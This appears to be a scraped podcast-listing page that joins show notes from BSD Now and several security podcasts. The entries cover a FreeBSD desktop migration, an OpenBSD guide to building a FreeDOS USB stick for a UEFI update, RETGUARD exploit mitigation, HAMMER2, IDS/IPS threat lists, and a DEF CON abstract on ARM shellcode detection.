work. As my dad was the one who introduced me to it, he still uses it as a use-case for his Debian setup. Instead I kept to the original PCManFM and it works just fine. I also loaded up my Bitcoin and Litecoin wallets and pointed them to the blockchain that I has used on Windows after their sync, they loaded perfectly and my balances were there. I kinda wish there was the Bitcoin-ABC full node Bitcoin Cash wallet package on FreeBSD, but I'm sure it will come out later. The rest is essentially just tweaks and making the environment more comfortable for me, and with most programs installed as packages I feel a lot better with upgrades and audit checking (‘pkg audit -F' is really helpful!). I will always hate Python, actually, I will always hate any app that has it's own package manager. I do miss the GUI GitHub tool on Windows. It was a really good-looking way to view all of my repos. The last thing (which is increasing it's priority every time I go to a social media site or YouTube) is fonts. My god I never thought it was such a problem, and UTF support is complicated. If anyone knows how to get all UTF characters to show up, please let me know. I'd really like Wikipedia articles to load perfectly (I followed this post and there are still some missing). There are some extra tweaks I followed here and here. Conclusion I successfully migrated from Windows 10 to FreeBSD 11.1 with minimal consequence. Shout out goes to the entire FreeBSD community. So many helpful people in there, and the forums are a great place to find tons of information. Also thanks to the ones who wrote the how-to articles I've referenced. I never would have gotten bhyve to work and I'd still probably be messing with my X config without them. I guess my take home from this is to not be afraid to make changes that may change how comfortable I am in an environment. I'm always open to comments and questions, please feel free to make them below. I purposefully didn't include too many technical things or commands in this article as I wanted to focus on the larger picture of the migration as a whole not the struggles of xorg.conf, but if you would like to see some of the configs or commands I used, let me know and I'll include some! TrueOS Rules of Conduct (https://www.trueos.org/rulesofconduct/) We believe code is truly agnostic and embrace inclusiveness regardless of a person's individual beliefs. As such we only ask the following when participating in TrueOS public events and digital forums: Treat each other with respect and professionalism. Leave personal and TrueOS unrelated conversations to other channels. In other words, it's all about the code. Users who feel the above rules have been violated in some way can register a complaint with abuse@trueos.org + Shorter than the BSD License (https://twitter.com/trueos/status/965994363070353413) + Positive response from the community (https://twitter.com/freebsdbytes/status/966567686015782912) I really like the @TrueOS Code of Conduct, unlike some other CoCs. It's short, clear and covers everything. Most #OpenSource projects are labour of love. Why do you need a something that reads like a legal contract? FreeBSD: The Unknown Giant (https://neomoevius.tumblr.com/post/171108458234/freebsd-the-unknown-giant) I decided to write this article as a gratitude for the recent fast answer of the FreeBSD/TrueOS community with my questions and doubts. I am impressed how fast and how they tried to help me about this operating system which I used in the past(2000-2007) but recently in 2017 I began to use it again. + A lot has changed in 10 years I was looking around the internet, trying to do some research about recent information about FreeBSD and other versions or an easy to use spins like PCBSD (now TrueOS) I used to be Windows/Mac user for so many years until 2014 when I decided to use Linux as my desktop OS just because I wanted to use something different. I always wanted to use unix or a unix-like operating system, nowadays my main objective is to learn more about these operating systems (Debian Linux, TrueOS or FreeBSD). FreeBSD has similarities with Linux, with two major differences in scope and licensing: FreeBSD maintains a complete operating system, i.e. the project delivers kernel, device drivers, userland utilities and documentation, as opposed to Linux delivering a kernel and drivers only and relying on third-parties for system software; and FreeBSD source code is generally released under a permissive BSD license as opposed to the copyleft GPL used by Linux.“ But why do I call FreeBSD “The Unknown Giant”?, because the code base of this operating system has been used by other companies to develop their own operating system for products like computers or also game consoles. + FreeBSD is used for storage appliances, firewalls, email scanners, network scanners, network security appliances, load balancers, video servers, and more So many people now will learn that not only “linux is everywhere” but also that “FreeBSD is everywhere too” By the way speaking about movies, Do you remember the movie “The Matrix”? FreeBSD was used to make the movie: “The photo-realistic surroundings generated by this method were incorporated into the bullet time scene, and linear interpolation filled in any gaps of the still images to produce a fluent dynamic motion; the computer-generated “lead in” and “lead out” slides were filled in between frames in sequence to get an illusion of orbiting the scene. Manex Visual Effects used a cluster farm running the Unix-like operating system FreeBSD to render many of the film's visual effects” + FreeBSD Press Release re: The Matrix (https://www.freebsd.org/news/press-rel-1.html) I hope that I gave a good reference, information and now so many people can understand why I am going to use just Debian Linux and FreeBSD(TrueOS) to do so many different stuff (music, 3d animation, video editing and text editing) instead use a Mac or Windows. + FreeBSD really is the unknown giant. OpenBSD and FreeDOS vs the hell in earth (https://steemit.com/openbsd/@npna/openbsd-and-freedos-vs-the-hell-in-earth) Yes sir, yes. Our family, composed until now by OpenBSD, Alpine Linux and Docker is rapidly growing. And yes, sir. Yes. All together we're fighting against your best friends, the infamous, the ugliest, the worst...the dudes called the privacy cannibals. Do you know what i mean, sure? We're working hard, no matter what time is it, no matter in what part in the world we are, no matter if we've no money. We perfectly know that you cannot do nothing against the true. And we're doing our best to expand our true, our doors are opened to all the good guys, there's a lot here but their brain was fucked by your shit tv, your fake news, your laws, etc etc etc. We're alive, we're here to fight against you. Tonight, yes it's a Friday night and we're working, we're ready to welcome with open arms an old guy, his experience will give us more power. Welcome to: FreeDOS But why we want to build a bootable usb stick with FreeDOS under our strong OpenBSD? The answer is as usual to fight against the privacy cannibals! More than one decade ago the old BIOS was silently replaced by the more capable and advanced UEFI, this is absolutely normal because of the pass of the years and exponencial grow of the power of our personal computers. UEFI is a complex system, it's like a standalone system operative with direct access to every component of our (yes, it's our not your!) machine. But...wait a moment...do you know how to use it? Do you ever know that it exist? And one more thing, it's secure? The answer to this question is totally insane, no, it's not secure. The idea is good, the company that started in theory is one of the most important in IT, it's Intel. The history is very large and obviously we're going to go very deep in it, but trust me UEFI and the various friend of him, like ME, TPM are insecure and closed source! Like the hell in earth. A FreeDOS bootable usb image under OpenBSD But let's start preparing our OpenBSD to put order in this chaos: $ mkdir -p freedos/stuff $ cd freedos/stuff $ wget https://www.ibiblio.org/pub/micro/pc-stuff/freedos/files/distributions/1.0/fdboot.img $ wget https://www.ibiblio.org/pub/micro/pc-stuff/freedos/files/dos/sys/sys-freedos-linux/sys-freedos-linux.zip $ wget https://download.lenovo.com/consumer/desktop/o35jy19usa_y900.exe $ wget http://145.130.102.57/domoticx/software/amiflasher/AFUDOS%20Flasher%205.05.04.7z Explanation in clear language as usual: create two directory, download the minimal boot disc image of FreeDOS, download Syslinux assembler MBR bootloaders, download the last Windows only UEFI update from Lenovo and download the relative unknown utility from AMI to flash our motherboard UEFI chipset. Go ahead: $ doas pkg_add -U nasm unzip dosfstools cabextract p7zip nasm the Netwide Assembler, a portable 80x86 assembler. unzip list, test and extract compressed files in a ZIP archive. dosfstoolsa collections of utilities to manipulate MS-DOSfs. cabextract program to extract files from cabinet. p7zipcollection of utilities to manipulate 7zip archives. $ mkdir sys-freedos-linux && cd sys-freedos-linux $ unzip ../sys-freedos-linux.zip $ cd ~/freedos && mkdir old new $ dd if=/dev/null of=freedos.img bs=1024 seek=20480 $ mkfs.fat freedos.img Create another working directory, cd into it, unzip the archive that we've downloaded, return to the working root and create another twos directories. dd is one of the most important utilities in the unix world to manipulate at byte level input and output: The dd utility copies the standard input to the standard output, applying any specified conversions. Input data is read and written in 512-byte blocks. If input reads are short, input from multiple reads are aggregated to form the output block. When finished, dd displays the number of complete and partial input and output blocks and truncated input records to the standard error output. We're creating here a virtual disk with bs=1024 we're setting both input and output block to 1024bytes; with seek=20480 we require 20480bytes. This is the result: -rw-r--r-- 1 taglio taglio 20971520 Feb 3 00:11 freedos.img. Next we format the virtual disk using the MS-DOS filesystem. Go ahead: $ doas su $ perl stuff/sys-freedos-linux/sys-freedos.pl --disk=freedos.img $ vnconfig vnd0 stuff/fdboot.img $ vnconfig vnd1 freedos.img $ mount -t msdos /dev/vnd0c old/ $ mount -t msdos /dev/vnd1c new/ We use the perl utility from syslinux to write the MBR of our virtual disk freedos.img. Next we create to loop virtual node using the OpenBSD utility vnconfig. Take care here because it is quite different from Linux, but as usual is clear and simple. The virtual nodes are associated to the downloaded fdboot.img and the newly created freedos.img. Next we mount the two virtual nodes cpartitions; in OpenBSD cpartition describes the entire physical disk. Quite different from Linux, take care. $ cp -R old/* new/ $ cd stuff $ mkdir o35jy19usa $ cabextract -d o35jy19usa o35jy19usa_y900.exe $ doas su $ cp o35jy19usa/ ../new/ $ mkdir afudos && cd afudos $ 7z e ../AFUDOS* $ doas su $ cp AFUDOS.exe ../../new/ $ umount ~/freedos/old/ && umount ~/freedos/new/ $ vnconfig -u vnd1 && vnconfig -u vnd0 Copy all files and directories in the new virtual node partition, extract the Lenovo cabinet in a new directory, copy the result in our new image, extract the afudos utility and like the others copy it. Umount the partitions and destroy the loop vnode. Beastie Bits NetBSD - A modern operating system for your retro battlestation (https://www.geeklan.co.uk/files/fosdem2018-retro) FOSDEM OS distribution (https://twitter.com/pvaneynd/status/960181163578019840/photo/1) Update on two pledge-related changes (https://marc.info/?l=openbsd-tech&m=151268831628549) *execpromises (https://marc.info/?l=openbsd-cvs&m=151304116010721&w=2) Slides for (BSD from scratch - from source to OS with ease on NetBSD) (https://www.geeklan.co.uk/files/fosdem2018-bsd/) Goobyte LastPass: You're fired! (https://blog.crashed.org/goodbye-lastpass/) *** Feedback/Questions Scott - ZFS Mirror with SLOG (http://dpaste.com/22Z8C6Z#wrap) Troels - Question about compressed ARC (http://dpaste.com/3X2R1BV#wrap) Jeff - FreeBSD Desktop DNS (http://dpaste.com/2BQ9HFB#wrap) Jonathon - Bhyve and gpu passthrough (http://dpaste.com/0TTT0DB#wrap) ***

BSD Now
211: It's HAMMER2 Time!

BSD Now

Play Episode Listen Later Sep 13, 2017 122:42


We explore whether a BSD can replicate Cisco router performance; RETGUARD, OpenBSDs new exploit mitigation technology, Dragonfly's HAMMER2 filesystem implementation & more! This episode was brought to you by Headlines Can a BSD system replicate the performance of a Cisco router? (https://www.reddit.com/r/networking/comments/6upchy/can_a_bsd_system_replicate_the_performance_of/) Short Answer: No, but it might be good enough for what you need Traditionally routers were built with a tightly coupled data plane and control plane. Back in the 80s and 90s the data plane was running in software on commodity CPUs with proprietary software. As the needs and desires for more speeds and feeds grew, the data plane had to be implemented in ASICs and FPGAs with custom memories and TCAMs. While these were still programmable in a sense, they certainly weren't programmable by anyone but a small handful of people who developed the hardware platform. The data plane was often layered, where features not handled by the hardware data plane were punted to a software only data path running on a more general CPU. The performance difference between the two were typically an order or two of magnitude. source (https://fd.io/wp-content/uploads/sites/34/2017/07/FDioVPPwhitepaperJuly2017.pdf) Except for encryption (e.g. IPsec) or IDS/IPS, the true measure of router performance is packets forwarded per unit time. This is normally expressed as Packets-per-second, or PPS. To 'line-rate' forward on a 1gbps interface, you must be able to forward packets at 1.488 million pps (Mpps). To forward at "line-rate" between 10Gbps interfaces, you must be able to forward at 14.88Mpps. Even on large hardware, kernel-forwarding is limited to speeds that top out below 2Mpps. George Neville-Neil and I did a couple papers on this back in 2014/2015. You can read the papers (https://github.com/freebsd-net/netperf/blob/master/Documentation/Papers/ABSDCon2015Paper.pdf) for the results. However, once you export the code from the kernel, things start to improve. There are a few open source code bases that show the potential of kernel-bypass networking for building a software-based router. The first of these is netmap-fwd which is the FreeBSD ip_forward() code hosted on top of netmap, a kernel-bypass technology present in FreeBSD (and available for linux). Full-disclosure, netmap-fwd was done at my company, Netgate. netmap-fwd will l3 forward around 5 Mpps per core. slides (https://github.com/Netgate/netmap-fwd/blob/master/netmap-fwd.pdf) The first of these is netmap-fwd (https://github.com/Netgate/netmap-fwd) which is the FreeBSD ip_forward() code hosted on top of netmap (https://github.com/luigirizzo/netmap), a kernel-bypass technology present in FreeBSD (and available for linux). Full-disclosure, netmap-fwd was done at my company, Netgate. (And by "my company" I mean that I co-own it with my spouse.). netmap-fwd will l3 forward around 5 Mpps per core. slides (https://github.com/Netgate/netmap-fwd/blob/master/netmap-fwd.pdf) Nanako Momiyama of the Keio Univ Tokuda Lab presented on IP Forwarding Fastpath (https://www.bsdcan.org/2017/schedule/events/823.en.html) at BSDCan this past May. She got about 5.6Mpps (roughly 10% faster than netmap-fwd) using a similar approach where the ip_foward() function was rewritten as a module for VALE (the netmap-based in-kernel switch). Slides (https://2016.eurobsdcon.org/PresentationSlides/NanakoMomiyama_TowardsFastIPForwarding.pdf) from her previous talk at EuroBSDCon 2016 are available. (Speed at the time was 2.8Mpps.). Also a paper (https://www.ht.sfc.keio.ac.jp/~nanako/conext17-sw.pdf) from that effort, if you want to read it. Of note: They were showing around 1.6Mpps even after replacing the in-kernel routing lookup algorithm with DXR. (DXR was written by Luigi Rizzo, who is also the primary author of netmap.) Not too long after netmap-fwd was open sourced, Ghandi announced packet-journey, an application based on drivers and libraries and from DPDK. Packet-journey is also an L3 router. The GitHub page for packet-journey lists performance as 21,773.47 mbps (so 21.77Gbps) for 64-byte UDP frames with 50 ACLs and 500,000 routes. Since they're using 64-byte frames, this translates to roughly 32.4Mpps. Finally, there is recent work in FreeBSD (which is part of 11.1-RELEASE) that gets performance up to 2x the level of netmap-fwd or the work by Nanako Momiyama. 10 million PPS: Here (http://blog.cochard.me/2015/09/receipt-for-building-10mpps-freebsd.html) is a decent introduction. But of course, even as FreeBSD gets up to being able to do 10gbps at line-rate, 40 and 100 gigabits are not uncommon now Even with the fastest modern CPUs, this is very little time to do any kind of meaningful packet processing. At 10Gbps, your total budget per packet, to receive (Rx) the packet, process the packet, and transmit (Tx) the packet is 67.2 ns. Complicating the task is the simple fact that main memory (RAM) is 70 ns away. The simple conclusion here is that, even at 10Gbps, if you have to hit RAM, you can't generate the PPS required for line-rate forwarding. There is some detail about design tradeoffs in the Ryzen architecture and how that might impact using those machines as routers Anyway... those are all interesting, but the natural winner here is FD.io's Vector Packet Processing (VPP). Read this (http://blogs.cisco.com/sp/a-bigger-helping-of-internet-please) VPP is an efficient, flexible open source data plane. It consists of a set of forwarding nodes arranged in a directed graph and a supporting framework. The framework has all the basic data structures, timers, drivers (and interfaces to both DPDK and netmap), a scheduler which allocates the CPU time between the graph nodes, performance and debugging tools, like counters and built-in packet trace. The latter allows you to capture the paths taken by the packets within the graph with high timestamp granularity, giving full insight into the processing on a per-packet level. The net result here is that Cisco (again, Cisco) has shown the ability to route packets at 1 Tb/s using VPP on a four socket Purley system There is also much discussion of the future of pfSense, as they transition to using VPP This is a very lengthy write up which deserves a full read, plus there are some comments from other people *** RETGUARD, the OpenBSD next level in exploit mitigation, is about to debut (https://marc.info/?l=openbsd-tech&m=150317547021396&w=2) This year I went to BSDCAN in Ottawa. I spent much of it in the 'hallway track', and had an extended conversation with various people regarding our existing security mitigations and hopes for new ones in the future. I spoke a lot with Todd Mortimer. Apparently I told him that I felt return-address protection was impossible, so a few weeks later he sent a clang diff to address that issue... The first diff is for amd64 and i386 only -- in theory RISC architectures can follow this approach soon. The mechanism is like a userland 'stackghost' in the function prologue and epilogue. The preamble XOR's the return address at top of stack with the stack pointer value itself. This perturbs by introducing bits from ASLR. The function epilogue undoes the transform immediately before the RET instruction. ROP attack methods are impacted because existing gadgets are transformed to consist of " RET". That pivots the return sequence off the ROP chain in a highly unpredictable and inconvenient fashion. The compiler diff handles this for all the C code, but the assembly functions have to be done by hand. I did this work first for amd64, and more recently for i386. I've fixed most of the functions and only a handful of complex ones remain. For those who know about polymorphism and pop/jmp or JOP, we believe once standard-RET is solved those concerns become easier to address seperately in the future. In any case a substantial reduction of gadgets is powerful. For those worried about introducing worse polymorphism with these "xor; ret" epilogues themselves, the nested gadgets for 64bit and 32bit variations are +1 "xor %esp,(%rsp); ret", +2 "and $0x24,%al; ret" and +3 "and $0xc3,%al; int3". Not bad. Over the last two weeks, we have received help and advice to ensure debuggers (gdb, egdb, ddb, lldb) can still handle these transformed callframes. Also in the kernel, we discovered we must use a smaller XOR, because otherwise userland addresses are generated, and cannot rely on SMEP as it is really new feature of the architecture. There were also issues with pthreads and dlsym, which leads to a series of uplifts around _builtinreturn_address and DWARF CFI. Application of this diff doesn't require anything special, a system can simply be built twice. Or shortcut by building & installing gnu/usr.bin/clang first, then a full build. We are at the point where userland and base are fully working without regressions, and the remaining impacts are in a few larger ports which directly access the return address (for a variety of reasons). So work needs to continue with handling the RET-addr swizzle in those ports, and then we can move forward. You can find the full message with the diff here (https://marc.info/?l=openbsd-tech&m=150317547021396&w=2) *** Interview - Ed Maste, Charlie & Siva - @ed_maste (https://twitter.com/ed_maste), @yzgyyang (https://twitter.com/yzgyyang) & @svmhdvn (https://twitter.com/svmhdvn) Co-op Students for the FreeBSD Foundation *** News Roundup Next DFly release will have an initial HAMMER2 implementation (http://lists.dragonflybsd.org/pipermail/users/2017-August/313558.html) The next DragonFly release (probably in September some time) will have an initial HAMMER2 implementation. It WILL be considered experimental and won't be an installer option yet. This initial release will only have single-image support operational plus basic features. It will have live dedup (for cp's), compression, fast recovery, snapshot, and boot support out of the gate. This first H2 release will not have clustering or multi-volume support, so don't expect those features to work. I may be able to get bulk dedup and basic mirroring operational by release time, but it won't be very efficient. Also, right now, sync operations are fairly expensive and will stall modifying operations to some degree during the flush, and there is no reblocking (yet). The allocator has a 16KB granularity (on HAMMER1 it was 2MB), so for testing purposes it will still work fairly well even without reblocking. The design is in a good place. I'm quite happy with how the physical layout turned out. Allocations down to 1KB are supported. The freemap has a 16KB granularity with a linear counter (one counter per 512KB) for packing smaller allocations. INodes are 1KB and can directly embed 512 bytes of file data for files 512 bytes. The freemap is also zoned by type for I/O locality. The blockrefs are 'fat' at 128 bytes but enormously powerful. That will allow us to ultimately support up to a 512-bit crypto hash and blind dedup using said hash. Not on release, but that's the plan. I came up with an excellent solution for directory entries. The 1KB allocation granularity was a bit high but I didn't want to reduce it. However, because blockrefs are now 128 byte entities, and directory entries are hashed just like in H1, I was able to code them such that a directory entry is embedded in the blockref itself and does not require a separate data reference or allocation beyond that. Filenames up to 64 bytes long can be accomodated in the blockref using the check-code area of the blockref. Longer filenames will use an additional data reference hanging off the blockref to accomodate up to 255 char filenames. Of course, a minimum of 1KB will have to be allocated in that case, but filenames are

Brakeing Down Security Podcast
2017-026-Machine_Learning-Market Hype, or infosec's blue team's newest weapon?

Brakeing Down Security Podcast

Play Episode Listen Later Aug 3, 2017 69:02


Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-026-Ally_miller_machine-learning-AI.mp3 Ally Miller (@selenakyle) joined us this week to discuss Machine Learning and #Artificial #Intelligence. It seems like every new security product employs one or both of these terms. She did the keynote at Bsides Las Vegas on topics of #Machine #Learning and #Behavioral #Economics. We asked Ms. Miller to join us here to discuss what ML and AI are, how algorithms work to analyze the data to come to the right conclusion. What is required to get a useful algorithm, and how much or little human interaction is required? We also discuss a bit of history with her, how IDS/IPS were just dumber versions of machine learning, with 'tweaks' being new Yara or snort rules to tell the machine what to allow/disallow.  Finally, we discussed how people who are doing our 2017 DerbyCon CTF, instructions on how to win are in the show, so please take a listen.   RSS: http://www.brakeingsecurity.com/rss Youtube Channel:  https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw #iTunes Store Link:  https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2  #Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast     Join our #Slack Channel! Sign up at https://brakesec.signup.team #iHeartRadio App:  https://www.iheart.com/show/263-Brakeing-Down-Securi/ #SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/           show notes   what is the required amount of data required to properly train the algorithms   how do you ensure that the training data is clean (or perhaps how do you determine what causes a false positive or negative)   Xoke Soru: "why are you trying to make skynet and kill us all?  Do you hate humanity?"   Who will ML replace? Who in security?   Ask why people get confused between AI and Machine learning, and where the fine line is between the two or is one actually a subset of the other.   Basically.. "in what way/how do you see ML being used in an offensive capacity in the future (or now)"   https://en.wikipedia.org/wiki/Artificial_neural_network   https://en.wikipedia.org/wiki/Machine_learning   https://en.wikipedia.org/wiki/Portal:Machine_learning   https://www.slideshare.net/allyslideshare/something-wicked-78511887   https://www.slideshare.net/allyslideshare/201209-a-million-mousetraps-using-big-data-and-little-loops-to-build-better-defenses   https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/61751   O’Reilly Conference 31 October   Mick douglas class Derbycon CTF Book club   Patreon slack

Brakeing Down Security Podcast
2017-002: Threat Lists, IDS/IPS rules, and mentoring

Brakeing Down Security Podcast

Play Episode Listen Later Jan 21, 2017 65:41


In your environment, you deal with threats from all over the world. Many groups out there pool resources to help everyone deal with those #threats. Some come in the form of threat #intelligence from various intelligence companies, like #Carbon #Black, #FireEye, and #Crowdstrike. But what if your company cannot afford such products, or are not ready to engage those types of companies, and still need need protections? Never fear, there are open source options available (see show notes below). These products aren't perfect, but they will provide a modicum of protection from 'known' bad actors, SSH trolls, etc. We discuss some of the issues using them, discuss how to use them in your #environment. Lastly, we discuss #mentorship. Having a good mentor/mentee relationship can be mutally beneficial to both parties. We discuss what it takes to be a good mentee, as well as a good mentor... RSS: www.brakeingsecurity.com/rss Direct Download: http://traffic.libsyn.com/brakeingsecurity/2017-002-mentoring_threat_lists.mp3 iTunes:  https://itunes.apple.com/us/podcast/2017-002-threat-lists-ids/id799131292?i=1000380246554&mt=2 YouTube: https://www.youtube.com/watch?v=oHNrINl1oZE   ---------- HITB announcement: “Tickets are on sale, And entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/ --------- Join our #Slack Channel! Sign up at https://brakesec.signup.team #RSS: http://www.brakeingsecurity.com/rss #Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast #SoundCloud: https://www.soundcloud.com/bryan-brake Comments, Questions, Feedback, or Suggestions?  Contact us via Email: bds.podcast@gmail.com #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Facebook: https://www.facebook.com/BrakeingDownSec/ #Tumblr: http://brakeingdownsecurity.tumblr.com/ #Player.FM : https://player.fm/series/brakeing-down-security-podcast #Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr #TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582   ---------- Show Notes: HANGOUTS:  https://hangouts.google.com/call/w7rkkde5yrew5nm4n7bfw4wfjme   2017-002-Threat Lists, IDS/IPS rulesets, and infosec mentoring   Threat Lists (didn’t have much time to research :/) THIS EXACTLY - http://blogs.gartner.com/anton-chuvakin/2014/01/28/threat-intelligence-is-not-signatures/    Don’t use threat list feeds (by IP/domain) as threat intelligence Can use them for aggressively blocking, don’t use for alerting https://isc.sans.edu/suspicious_domains.html https://rules.emergingthreats.net/fwrules/emerging-Block-IPs.txt http://iplists.firehol.org/ https://zeltser.com/malicious-ip-blocklists/ https://medium.com/@markarenaau/actionable-intelligence-is-it-a-capability-problem-or-does-your-intelligence-provider-suck-d8d38b1cbd25#.ncpmqp9cx Spamhaus: https://www.spamhaus.org/ leachers Open rulesets - You can always depend on the kindness of strangers Advantage is that these are created by companies that have worldwide reach Updated daily Good accompanying documentation You can buy large rulesets to use in your own IDS implementation Depends on your situation if you want to go managed or do yourself Regardless you need to test them Managed security services will do this for you I don’t recommend unless you have a team of dedicated people or you don’t care about getting hacked- signatures are way too dynamic, like trying to do AV sigs all by yourself Only a good idea for one-off, targeted attacks DIY IDS/IPS rulesets https://securityintelligence.com/signature-based-detection-with-yara/ http://yararules.com/ http://resources.infosecinstitute.com/yara-simple-effective-way-dissecting-malware/ Yara rules For Mentors Set expectations & boundaries Find a good fit Be an active listener Keep open communication Schedule time Create homework Don’t assume technical level Ask questions Do your own research Find a good fit Put forth effort It’s not the Mentor’s job to handhold, take responsibility for own learning Value their time Come to each meeting with an agenda For Mentees Mentoring frameworks? InfoSec Mentoring https://t.co/mLXjfF1HEr https://gist.github.com/AFineDayFor/5cdd0341a2b384c20e615dcedeef0741 Podcasts (Courtesy of Ms. Hannelore) https://t.co/mLXjfF1HEr https://gist.github.com/AFineDayFor/5cdd0341a2b384c20e615dcedeef074

Securizando
Podcast – 04 – IPS/IDS

Securizando

Play Episode Listen Later Sep 28, 2016 12:06


En este capítulo haré una introducción al funcionamiento de los IPS/IDS, indicando qué los diferencia de los firewall (aunque hoy en día la mayoría de soluciones firewall incorporan servicios IDS/IPS), y cuál es la ubicación oportuna para montarlo dentro de nuestra red.

ids ips ips ids
Paul's Security Weekly TV
Enterprise Security Weekly #6 - IDS/IPS

Paul's Security Weekly TV

Play Episode Listen Later Jun 4, 2016 38:31


This week is, well, rough, ServiceNow buys threat intelligence company, memory scanning in the hypervisor, and next-generation network segmentation and NAC, and John and I discuss the evolution of IDS and IPS! Full Show Notes Here: http://wiki.securityweekly.com/wiki/index.php/ES_Episode6 Visit http://securityweekly.com/esw for all the latest episodes!

Paul's Security Weekly
Enterprise Security Weekly #6 - IDS/IPS

Paul's Security Weekly

Play Episode Listen Later Jun 4, 2016 38:31


This week is, well, rough, ServiceNow buys threat intelligence company, memory scanning in the hypervisor, and next-generation network segmentation and NAC, and John and I discuss the evolution of IDS and IPS! Full Show Notes Here: http://wiki.securityweekly.com/wiki/index.php/ES_Episode6 Visit http://securityweekly.com/esw for all the latest episodes!

Enterprise Security Weekly (Audio)
Enterprise Security Weekly #6 - IDS/IPS

Enterprise Security Weekly (Audio)

Play Episode Listen Later Jun 1, 2016 38:31


This week is, well, rough, ServiceNow buys threat intelligence company, memory scanning in the hypervisor, and next-generation network segmentation and NAC, and John and I discuss the evolution of IDS and IPS! Full Show Notes Here: http://wiki.securityweekly.com/wiki/index.php/ES_Episode6 Visit http://securityweekly.com/esw for all the latest episodes!

Enterprise Security Weekly (Video)
Enterprise Security Weekly #6 - IDS/IPS

Enterprise Security Weekly (Video)

Play Episode Listen Later Jun 1, 2016 38:31


This week is, well, rough, ServiceNow buys threat intelligence company, memory scanning in the hypervisor, and next-generation network segmentation and NAC, and John and I discuss the evolution of IDS and IPS! Full Show Notes Here: http://wiki.securityweekly.com/wiki/index.php/ES_Episode6 Visit http://securityweekly.com/esw for all the latest episodes!

DEF CON 22 [Materials] Speeches from the Hacker Convention.
Svetlana Gaivoronski and Ivan Petrov - Shellcodes for ARM: Your Pills Don't Work on Me, x86

DEF CON 22 [Materials] Speeches from the Hacker Convention.

Play Episode Listen Later Dec 13, 2014


Slides Here: https://defcon.org/images/defcon-22/dc-22-presentations/Petrov-Gaivoronski/DEFCON-22-Ivan-Petrov-Svetlana-Gaivoronski-ShellCodes-for-ARM-Updated.pdf Extra Materials are available here: https://defcon.org/images/defcon-22/dc-22-presentations/Petrov-Gaivoronski/DEFCON-22-Ivan-Petrov-Svetlana-Gaivoronski-ShellCodes-for-ARM.avi Shellcodes for ARM: Your Pills Don't Work on Me, x86 Svetlana Gaivoronski PHD STUDENT, MOSCOW STATE UNIVERSITY, RUSSIA Ivan Petrov MASTERS STUDENT, MOSCOW STATE UNIVERSITY, RUSSIA Despite that it is almost 2014, the problem of shellcode detection, discovered in 1999, is still a challenge for researchers in industry and academia. The significance of remotely exploitable vulnerabilities does not seem to fade away. The number of remotely exploitable vulnerabilities continues to grow despite the significant efforts in improving code quality via code analysis tools, code review, and plethora of testing methods. The other trend of recent years is the rise of variety of ARM-based devices such as mobile phones, tablets, etc. As of now the total number of ARM-based devices exceeds the number of PCs in times. This trend sometimes is terrifying as people trust almost all aspects of their lives to such digital devices. People care much more about convenience than security of the data. For example, mobile phones now knows our financial information, health records, keeps a lot of other private data. That's why ARM-based systems became a cherry pie for attackers. There is a variety of shellcode detection methods that work more or less acceptable with x86-based shellcodes. There are even hybrid solutions that combine capabilities of existing approaches. Unfortunately, almost all of them focus on a fixed set of shellcode features, specific for x86 architecture. This work aims to cover this gap. This work makes the following contributions: • We provide an analysis of existing shellcode detection methods with regards to their applicability to shellcodes developed for ARM architecture. As a result, we show that most of existing algorithms are not applicable for shellcodes written for ARM. Moreover, the methods that work for ARM shellcodes produce too many false positives to be applicable for real-life network channels and 0-day detection. • We analyzed available ARM-based shellcodes from public exploit databases, and identified a set of ARM shellcode features that distinguishes them from x86 shellcodes and benign binaries. • We implemented our detectors of ARM shellcode features as an extension for Demorpheus[1] shellcode detection open-source library. The algorithm used for generation of detectors’ topology guarantees the solution to be optimal in terms of computational complexity and false positive rate. Svetlana Gaivoronski is a PhD student at Computer Systems Lab, Computer Science Dept. of Moscow State University, Russia. Svetlana was a member of the Bushwhackers CTF team. Svetlana worked at Redsecure project (experimental IDS/IPS) at Moscow State University. At summer 2013 Svetlana worked in Microsoft Research on a botnets detection in clouds project. Now Svetlana works on shellcode-detection and DDoS-mitigation projects. Her primary interests are network worm propagation detection and filtering, shellcode detection, static and runtime analysis of malware, DDoS detection and filtering. Twitter: @SadieSv Ivan Petrov is a master student at Computer Systems Lab, Computer Science Dept. of Moscow State University, Russia. Ivan is an active member of Bushwhackers CTF team, which is the winner of iCTF competitions this year. Ivan works on shellcode-detection projects. His primary interests are mobile security and network security, including analysis of ARM-based malware. Twitter: _IvanPetrov_

Brakeing Down Security Podcast
Episode 10: IDS/IPS

Brakeing Down Security Podcast

Play Episode Listen Later Mar 30, 2014 36:26


We discuss IDS and IPS, why they are needed, and why they get a pass on how easily they are bypassed, and why AV gets all the press...           Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 3.0http://creativecommons.org/licenses/by/3.0/      

Paul's Security Weekly
Security Weekly - Security Weekly - Episode 217 Part 2 - October 28, 2010

Paul's Security Weekly

Play Episode Listen Later Oct 31, 2010 92:01


